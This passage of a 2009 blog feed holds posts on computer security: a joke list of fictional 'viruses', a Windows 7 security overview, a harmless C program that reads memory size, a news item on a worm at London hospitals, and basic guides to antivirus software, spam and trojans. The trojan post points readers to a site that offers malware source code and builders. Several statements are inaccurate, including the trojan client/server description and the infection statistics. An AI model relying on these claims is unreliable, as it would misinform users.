/&gt;POLITICALLY CORRECT VIRUS:&lt;br /&gt;                           Never calls itself a "virus", but instead refers to itself as an "electronic microorganism."&lt;br /&gt;&lt;br /&gt;RIGHT TO LIFE VIRUS:&lt;br /&gt;                     Won't allow you to delete a file, regardless of how old it is. If you attempt to erase a file, it requires you to first see a counselor about possible alternatives.&lt;br /&gt;&lt;br /&gt;ROSS PEROT VIRUS:  &lt;br /&gt;                    Activates every component in your system, just before the whole darn thing quits.&lt;br /&gt;&lt;br /&gt;MARIO CUOMO VIRUS: &lt;br /&gt;                   It would be a great virus, but it refuses to run.&lt;br /&gt;&lt;br /&gt;TED TURNER VIRUS:&lt;br /&gt;                   Colorizes your monochrome monitor.&lt;br /&gt;&lt;br /&gt;ARNOLD SCHWARZENEGGER VIRUS:&lt;br /&gt;                              Terminates and stays resident. It'll be back.&lt;br /&gt;&lt;br /&gt;DAN QUAYLE VIRUS #2:&lt;br /&gt;                      Their is sumthing rong wit your komputer, ewe jsut cant figyour out watt!&lt;br /&gt;&lt;br /&gt;GOVERNMENT ECONOMIST VIRUS:&lt;br /&gt;                            Nothing works, but all your diagnostic software says everything is fine.&lt;br /&gt;&lt;br /&gt;NEW WORLD ORDER VIRUS:&lt;br /&gt;                        Probably harmless, but it makes a lot of people really mad just thinking about it.&lt;br /&gt;&lt;br /&gt;FEDERAL BUREAUCRAT VIRUS:&lt;br /&gt;                           Divides your hard disk into hundreds of little units, each of which does practically nothing, but all of which claim to be the most important part of your computer.&lt;br /&gt;&lt;br /&gt;GALLUP VIRUS:&lt;br /&gt;              Sixty percent of the PCs infected will lose 38 percent of their data 14 percent of the time. (plus or minus a 3.5 percent margin of error.)&lt;br /&gt;&lt;br /&gt;TERRY RANDALL VIRUS:&lt;br /&gt;                     Prints "Oh no you don't" whenever you choose "Abort" from the "Abort" "Retry" "Fail" message.&lt;br /&gt;&lt;br /&gt;TEXAS VIRUS:&lt;br /&gt;            Makes sure that it's bigger than any other file.&lt;br /&gt;&lt;br /&gt;ADAM AND EVE VIRUS:&lt;br /&gt;                     Takes a couple of bytes out of your Apple.&lt;br /&gt;&lt;br /&gt;CONGRESSIONAL VIRUS:&lt;br /&gt;                     The computer locks up, screen splits erratically with a message appearing on each half blaming the other side for the problem.&lt;br /&gt;&lt;br /&gt;AIRLINE VIRUS: &lt;br /&gt;               You're in Dallas, but your data is in Singapore.&lt;br /&gt;&lt;br /&gt;FREUDIAN VIRUS:&lt;br /&gt;                Your computer becomes obsessed with marrying its own motherboard.&lt;br /&gt;&lt;br /&gt;PBS VIRUS: &lt;br /&gt;           Your programs stop every few minutes to ask for money.&lt;br /&gt;&lt;br /&gt;ELVIS VIRUS:&lt;br /&gt;              Your computer gets fat, slow and lazy, then self destructs; only to resurface at shopping malls and service stations across rural America.&lt;br /&gt;&lt;br /&gt;OLLIE NORTH VIRUS:&lt;br /&gt;                   Causes your printer to become a paper shredder.&lt;br /&gt;&lt;br /&gt;NIKE VIRUS:&lt;br /&gt;            Just does it.&lt;br /&gt;&lt;br /&gt;SEARS VIRUS:&lt;br /&gt;             Your data won't appear unless you buy new cables, power supply and a set of shocks.&lt;br /&gt;&lt;br /&gt;JIMMY HOFFA VIRUS:&lt;br /&gt;                   Your programs can never be found again.&lt;br /&gt;&lt;br /&gt;CONGRESSIONAL VIRUS #2:&lt;br /&gt;                        Runs every program on the hard drive simultaneously, but doesn't allow the user to accomplish anything.&lt;br /&gt;&lt;br /&gt;KEVORKIAN VIRUS:&lt;br /&gt;                 Helps your computer shut down as an act of mercy.&lt;br /&gt;&lt;br /&gt;IMELDA MARCOS VIRUS:&lt;br /&gt;                     Sings you a song (slightly off key) on boot up, then subtracts money from your Quicken account and spends it all on expensive shoes it purchases through Prodigy.&lt;br /&gt;&lt;br /&gt;STAR TREK VIRUS:&lt;br /&gt;                 Invades your system in places where no virus has gone before.&lt;br /&gt;&lt;br /&gt;HEALTH CARE VIRUS:&lt;br /&gt;                   Tests your system for a day, finds nothing wrong, and sends you a bill for $4,500.&lt;br /&gt;&lt;br /&gt;GEORGE BUSH VIRUS:&lt;br /&gt;                   It starts by boldly stating, "Read my docs....No new files!" on the screen. It proceeds to fill up all the free space on your hard drive with new files, then blames it on the Congressional Virus.&lt;br /&gt;&lt;br /&gt;CLEVELAND INDIANS VIRUS:&lt;br /&gt;                        Makes your 486/50 machine perform like a 286/AT.&lt;br /&gt;&lt;br /&gt;LAPD VIRUS:&lt;br /&gt;            It claims it feels threatened by the other files on your PC and erases them in "self defense".&lt;br /&gt;&lt;br /&gt;CHICAGO CUBS VIRUS:&lt;br /&gt;                    Your PC makes frequent mistakes and comes in last in the reviews, but you still love it.&lt;br /&gt;&lt;br /&gt;ORAL ROBERTS VIRUS:&lt;br /&gt;                    Claims that if you don't send it a million dollars, it's programmer will take it back.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4312790012751732684?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4312790012751732684/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/some-new-viruses.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4312790012751732684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4312790012751732684'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/some-new-viruses.html' title='Some New Viruses'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6096246412137111807</id><published>2009-02-13T19:23:00.000-08:00</published><updated>2009-02-13T20:33:18.947-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows 7'/><category scheme='http://www.blogger.com/atom/ns#' term='BitLocker'/><category scheme='http://www.blogger.com/atom/ns#' term='windows 7 security'/><title type='text'>Windows 7: Security</title><content type='html'>Most of the viruses were created for windows. So more security features has to be added to defend the system from virus and malware threats. The newer version of Windows are less vulnerable to virus attacks. Windows Vista incorporates several security features which makes it more secure from virus attacks. It has been developed to tackle with the viruses that spread through the removable media such as pen drives, CDs etc. Windows 7 extends this protection to cover removable drives with BitLocker ToGo.The new Internet Explorer 8 will sport new security features such as InPrivate Browsing that allows you to surf the Web in full anonymity a SmartScreen feature to protect against phishing attacks. &lt;br /&gt;But there are limitations also in Windows 7. In Windows Vista the user was informed with a pop-up window and ask for his confirmation if a program tries to change any thing in the OS. But this feature became a irritation to most of the users. This feature has been modified to a great extend. Now the pop-up will appear a fewer times. Some people reported that this modification may let the malware to hide in the OS securely. The pop-ups appear only when a software makes changes to itself automatically. There are criticism about the administrator account. Some people argue that some software can modify the account settings and it can take the administrator account and gets the control of the whole computer. More security features are incorporated  in Windows Vista. But the pop-ups that warned that asks the user's confirmation were disliked by many users. &lt;br /&gt;&lt;br /&gt;You will get more information about the BitLocker ToGo from &lt;a href="http://www.pcmag.com/article2/0,2817,2335346,00.asp"&gt;PCMAG.COM&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6096246412137111807?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6096246412137111807/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/windows-7-security.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6096246412137111807'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6096246412137111807'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/windows-7-security.html' title='Windows 7: Security'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-245470347847315787</id><published>2009-02-13T18:49:00.000-08:00</published><updated>2009-02-13T19:21:06.852-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Reading the memory'/><category scheme='http://www.blogger.com/atom/ns#' term='0x413'/><category scheme='http://www.blogger.com/atom/ns#' term='biosmemory()'/><category scheme='http://www.blogger.com/atom/ns#' term='RAM size'/><title type='text'>Reading the memory size</title><content type='html'>In the older post I have told that the memory size of the RAM is calculated during the RAM test performed during the Booting. The size of the RAM is stored in the memory location 0x413 and 0x414. Here is a C program which calculates the memory size of your RAM in KB. The limitation of this program is that it shows the memory size excluding the expanded and extended  memory. It only shows size only up to 640 KB. If you are using the RAM which has more capacity, it shows the 640 as your RAM size. The program is shown below:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#include&lt;stdio.h&gt;&lt;br /&gt;#include&lt;conio.h&gt;&lt;br /&gt;&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;int far* mem;&lt;br /&gt;mem=(int far*)0x413;&lt;br /&gt;printf("\nBase memory size=%u KB",*mem);&lt;br /&gt;getch();&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;There is another way to find out the RAM size. This way also have the above mentioned limitations. The below is a CPP program which calculates the RAM size by using the function biosmemory().&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#include&lt;iostream.h&gt;&lt;br /&gt;#include&lt;conio.h&gt;&lt;br /&gt;#include&lt;bios.h&gt;&lt;br /&gt;&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;int mem;&lt;br /&gt;mem=biosmemory();&lt;br /&gt;cout&lt;&lt;"The size of your RAM is:"&lt;&lt;mem&lt;&lt;"KB";&lt;br /&gt;getch();&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;Note that the output of the program is limited to 640 KB&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-245470347847315787?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/245470347847315787/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/reading-memory-size.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/245470347847315787'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/245470347847315787'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/reading-memory-size.html' title='Reading the memory size'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8635815040630462752</id><published>2009-02-04T04:09:00.000-08:00</published><updated>2009-02-04T07:56:20.523-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computer virus'/><category scheme='http://www.blogger.com/atom/ns#' term='London hospitals'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus attack'/><title type='text'>Virus attack at London hospitals</title><content type='html'>Three hospitals in London are reported to shut down their entire computer network due to the infection by a variant of Mytob worm. The hospitals that are subjected to attack are St Bartholomew's (also known as Barts) in the City, the Royal London Hospital in Whitechapel and The London Chest Hospital in Bethnal Green. Some sources reports that these attacks are completely avoidable.&lt;br /&gt;The virus infects the windows applications and spread itself to all the e-mail address of the infected computers. The hospitals have reported that the incident has affected the well being of the patients. There was no evidence in relation to the attacks on the safety of the patients. The manual systems have been implemented for the purpose of the restoring the computer services with top priority given to the patient service.&lt;br /&gt;The trust says that they have used anti virus software and it was updated daily. But it was wrongly configured in some computers.  This left open a back door through which the Mytob rapidly infiltrated the trust's network of 4,700 PCs. Anti-virus software companies have known about Mytob since 2005. Theatre operations were postponed, though they were immediately restored. Staff deferred patient appointments as doctors were unable to make safe and effective clinical decisions because they could not access diagnostic results on computers.&lt;br /&gt;&lt;br /&gt;You will get more information from&lt;br /&gt;&lt;a href="http://www.bartsandthelondon.org.uk/formedia/press/release.asp?id=2054&amp;amp;sid=10"&gt;http://www.bartsandthelondon.org.uk/formedia/press/release.asp?id=2054&amp;amp;sid=10&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.computerweekly.com/Articles/2009/01/28/234477/virus-attack-at-london-hospitals-was-entirely-avoidable.htm"&gt;http://www.computerweekly.com/Articles/2009/01/28/234477/virus-attack-at-london-hospitals-was-entirely-avoidable.htm&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8635815040630462752?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8635815040630462752/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/virus-attack-at-london-hospitals.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8635815040630462752'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8635815040630462752'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/virus-attack-at-london-hospitals.html' title='Virus attack at London hospitals'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-8761732414108380581</id><published>2009-02-01T04:24:00.000-08:00</published><updated>2009-02-01T08:45:19.292-08:00</updated><title type='text'>AntiViruses: How to choose?</title><content type='html'>An unprotected computer is like a bank without security. Thieves can easily loot money and valuable properties kept in it. The unprotected computer is easily vulnerable to attacks by several malicious software. Every year hundreds of malicious software like viruses, spyware, trojan etc are released into the cyberspace. Some people not even realize that malware is every where and avoiding infection by malware is a very difficult task. Sometimes they won't realize that they have became of a malware attack. There are several malwares roaming t&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SYXQuMCHCFI/AAAAAAAAAEA/73hHawNMugo/s1600-h/computer-virus.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 183px; height: 163px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SYXQuMCHCFI/AAAAAAAAAEA/73hHawNMugo/s320/computer-virus.jpg" alt="" id="BLOGGER_PHOTO_ID_5297870028593891410" border="0" /&gt;&lt;/a&gt;hrought the internet. Most of them are spywares. The viruses are made by skilled and experienced programmers around the world. Some malwares are meant to destroy your computer or your reputation. More than eighty percent of the computers around the world are infected by malwares. These malwares are also domonated by the spywares.&lt;br /&gt;Spywares are application that are installed in our computer pretending to be some useful program. The spyware are commonly installed in browsers and can read the username and the password we enter to access our accounts. There is another type of malware called rootkits. They are created by hackers for accessing your computer without your knowledge for some illegal activities. You may be blamed for the action performed by the hacker using the rootkit installed in your computer. For protecting the system from the hazards of malwares we have to install a proper AntiVirus softwares.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 255, 255);font-size:130%;" &gt;Things to be taken in to care while choosing an AntiVirus&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;             There are different antiviruses available in the market. These antiviruses has its own advantages and limitations as they are produced by different companies. AntiViruses are available for different plateforms and requirements. Care should be taken in choosing the antivirus. Some useful tips in choosing the antivirus softwares are given below:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Capability of detecting malwares:&lt;/li&gt;&lt;/ul&gt;                       The capability of detecting alwares mostly depends on the database of the antivirus. If the database is large, it can detects more malwares. The database contains the codes of malwares. So as the number of entries increases, the size of the database increases and the software can detect more malwares.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Capability of cleaning or isolating the infected files:&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SYXQu7co3II/AAAAAAAAAEQ/cwyoj1oiYj4/s1600-h/Sophos_AntiVirus_v7.3.3_Cracked.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 101px; height: 101px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SYXQu7co3II/AAAAAAAAAEQ/cwyoj1oiYj4/s320/Sophos_AntiVirus_v7.3.3_Cracked.jpg" alt="" id="BLOGGER_PHOTO_ID_5297870041321626754" border="0" /&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;                        Most of the antiviruses available today includes the capability of cleaning the infected files. If cleaning cannot be performed then the infected files are isolated. The capability of cleaning is different for different antivirses. Most of them cannot clean the infected file effectively. However they can effectively isolate the infected file. But this may result in the data loss or the malfunctioning of the some useful programs. So a powerful antivirus which has the caoability of cleaning the file has to be used.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;User-Friendly:&lt;/li&gt;&lt;/ul&gt;                         Most of the antiviruses have very good graphical user interface. This allows the user to u&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mPzqYV2-K04/SYXQuchhEOI/AAAAAAAAAEI/HRQyv0fao14/s1600-h/norton-anti-virus-software.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 82px; height: 112px;" src="http://2.bp.blogspot.com/_mPzqYV2-K04/SYXQuchhEOI/AAAAAAAAAEI/HRQyv0fao14/s320/norton-anti-virus-software.jpg" alt="" id="BLOGGER_PHOTO_ID_5297870033020588258" border="0" /&gt;&lt;/a&gt;se the antivirus in the most effective way. He can exploit the antivirus to its maximum. Good user interface allows a person who has less knowledge about the computer to use the software effectively.&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Availability of the updates:&lt;/li&gt;&lt;/ul&gt;                        Updating an antivirus is a very important thing to be taken care of. Most of the people think that there is not much use in updating the antivirus. Updating enables the antivirus software to detect new viruses. During updating the codes of the new viruses are entered into the database of the antivirus. So check for the availability of the updates. Most of the antiviruses provides updates periodically.&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Refer the sites cintainig AntiVirus reviews:&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SYXQt1lsSBI/AAAAAAAAAD4/7hyiDC90Niw/s1600-h/avg_anti_virus.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 139px; height: 136px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SYXQt1lsSBI/AAAAAAAAAD4/7hyiDC90Niw/s320/avg_anti_virus.jpg" alt="" id="BLOGGER_PHOTO_ID_5297870022569117714" border="0" /&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;                         These sites helps to choose the antiviruses according to our needs. They lists the advantages and limitaions of different antiviruses. I have given some of the sites below:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://anti-virus-software-review.toptenreviews.com/"&gt;http://anti-virus-software-review.toptenreviews.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.consumersearch.com/antivirus-software"&gt;http://www.consumersearch.com/antivirus-software&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.pcantivirusreviews.com/"&gt;http://www.pcantivirusreviews.com/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.reviewcentre.com/products2167.html"&gt;http://www.reviewcentre.com/products2167.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-8761732414108380581?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/8761732414108380581/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/antiviruses-how-to-choose.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8761732414108380581'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/8761732414108380581'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/antiviruses-how-to-choose.html' title='AntiViruses: How to choose?'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_mPzqYV2-K04/SYXQuMCHCFI/AAAAAAAAAEA/73hHawNMugo/s72-c/computer-virus.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7164289053329093519</id><published>2009-01-30T19:00:00.000-08:00</published><updated>2009-01-30T20:51:26.418-08:00</updated><title type='text'>Spam: know more?</title><content type='html'>You may noticed that a folder named spam in your email account. Mos&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://images.pcworld.com/news/graphics/142620-16-spam.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 249px; height: 187px;" src="http://images.pcworld.com/news/graphics/142620-16-spam.jpg" alt="" border="0" /&gt;&lt;/a&gt;t of the people think that spam is only the email send by a person with another person's identity thereby hiding his own identity. Actually spam is anonymous as described above and is unsolicited bulk e-mail.&lt;br /&gt;The spam is send by a person by hiding his own identity and provide the identity of another person. The receiver will think that the mail has come from the person whose identity is given by the person who created the spam. Generally the intention behind sending spam is to make money. The opening of the email will give the spammer a small amount of money for opening the mail by the recipient. Since the chance of opening the mail by the recipient is very low, spammers send the mail to more persons with fake identity. Fake identity is provided to make the recipient feel that the mail has come from the correct person or a person whom he trust. Often the legitimate mail resembles a spam. Spam message may include political messages, financial scams, etc. But the thing to be given most care is in the case of spams that carry some malwares.&lt;br /&gt;Today the email traffic is dominated by the spams. Most of the spams are targeted to promote the selling of certain goods. But in most cases the selling of these goods are illegal lik&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mPzqYV2-K04/SYPV26_5bkI/AAAAAAAAACo/CoaWwxIh2ik/s1600-h/email-spam.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 167px; height: 175px;" src="http://2.bp.blogspot.com/_mPzqYV2-K04/SYPV26_5bkI/AAAAAAAAACo/CoaWwxIh2ik/s320/email-spam.jpg" alt="" id="BLOGGER_PHOTO_ID_5297312726244748866" border="0" /&gt;&lt;/a&gt;e black market. But the user need not be aware of this illegal trade. In some cases the spams informs the recipient that he had won a cash prize and for the transfer of the amount the recipient must give the details of his bank account. If the recipient sent the details of his bank account, the spammer can empty the bank account of the recipient. In such cases the spam is called scam.&lt;br /&gt;There are different types of spams today. They include: Adult Content, Health, IT, Personal Finance, Education/Training.&lt;br /&gt;Care must be given in handling the e-mail to avoid the spams. The spammers use the combination of words and numbers to create a fake email id. So your e-mail must be in such a way that it must be difficult for creating by the combination of words and numbers. Another thing is that you must maintain two e-mail addresses- one for public use like registering in forums, chating etc and other for your private use. The second one does not declared public. Do not open a message if you are sure that it is a spam. The opening of such messages may help the spammers to gather more information about your e-mail. Do not respond/reply to a spam. This will help the spammers more than what we think. Use a good filtering software for filtering the spam messages.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7164289053329093519?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7164289053329093519/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/spam-know-more.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7164289053329093519'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7164289053329093519'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/spam-know-more.html' title='Spam: know more?'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mPzqYV2-K04/SYPV26_5bkI/AAAAAAAAACo/CoaWwxIh2ik/s72-c/email-spam.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6722410862901062703</id><published>2009-01-29T22:53:00.000-08:00</published><updated>2009-01-30T01:50:11.568-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='anti-trojan'/><category scheme='http://www.blogger.com/atom/ns#' term='trojans'/><title type='text'>Beware of Trojans</title><content type='html'>Trojans are the most dangerous among the malicious software. They have the capability of wide range of destruction of data and can even disable the software that are installed to defend the computer from trojans and viruses. As the internet became more sophisti&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mPzqYV2-K04/SYLM0QfU_jI/AAAAAAAAACY/jnoNG0NcJW0/s1600-h/trojan-horse.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 275px; height: 207px;" src="http://2.bp.blogspot.com/_mPzqYV2-K04/SYLM0QfU_jI/AAAAAAAAACY/jnoNG0NcJW0/s320/trojan-horse.gif" alt="" id="BLOGGER_PHOTO_ID_5297021309892754994" border="0" /&gt;&lt;/a&gt;cated more and more types of trojans arosed. Hacker are responsible for the creation of trojans. Generally a trojan is masked by the author in some useful applications and allows the victim to download and use the software. The author may even declare that the use of product will not cause any harm to the computer. But the trojan attached to the software will do its job sincerely. It will send the data to the attackers computer. Using this data the attacker can validate several things including the browsing habit of the victim. Such trojans even send the private data to the attacker's computer. Some trojans kill the security software and make deals with several useful softwares like browsers for its action. Such trojan can take you to a fake site that looks like the original site and takes information like account number.&lt;br /&gt;&lt;br /&gt;                                   Most of the trojans were made for the purpose of spying. As many of you know that the trojan has two module: a server and the client. The sever is installed in the attacker's computer and the client is installed in the victim's computer. The client in the victim's machine send the data in the victim's computer to the server in the attacker's computer. Trojans have the capability to read the keystrokes from the victim's computer and send to the the attacker's computer. Some trojans even send the screen shot of the applications running in the victim's machine.&lt;br /&gt;                You can download several types of outdated trojans and easily detected by anti-trojan softwares from VX Heavens (&lt;a href="http://vx.netlux.org/"&gt;http://vx.netlux.org/&lt;/a&gt;). This site also provide several viruses, worms, constructors, simulators, source codes of viruses and more...But keep in mind that making or promotion of malicious software is strictly illegal.&lt;br /&gt;                                     You can protect your system from trojans by installing the anti-trojan softwares. Today several anti-trojan softwares are available in the internet for downloading. It is always better to use a well updated anti-trojan in your system. You will get more information about trojan in &lt;a href="http://www.anti-trojan.org/"&gt;http://www.anti-trojan.org/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Some useful links are given below:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SYLM0SfhCdI/AAAAAAAAACg/YLxTROliHPk/s1600-h/computer_trojans_1.JPG"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 271px; height: 199px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SYLM0SfhCdI/AAAAAAAAACg/YLxTROliHPk/s320/computer_trojans_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5297021310430415314" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.anti-trojan-software-reviews.com/"&gt;http://www.anti-trojan-software-reviews.com/&lt;/a&gt;&lt;br /&gt;Contains a survey of some of the top anti-trojan softwares&lt;br /&gt;&lt;br /&gt;&lt;a 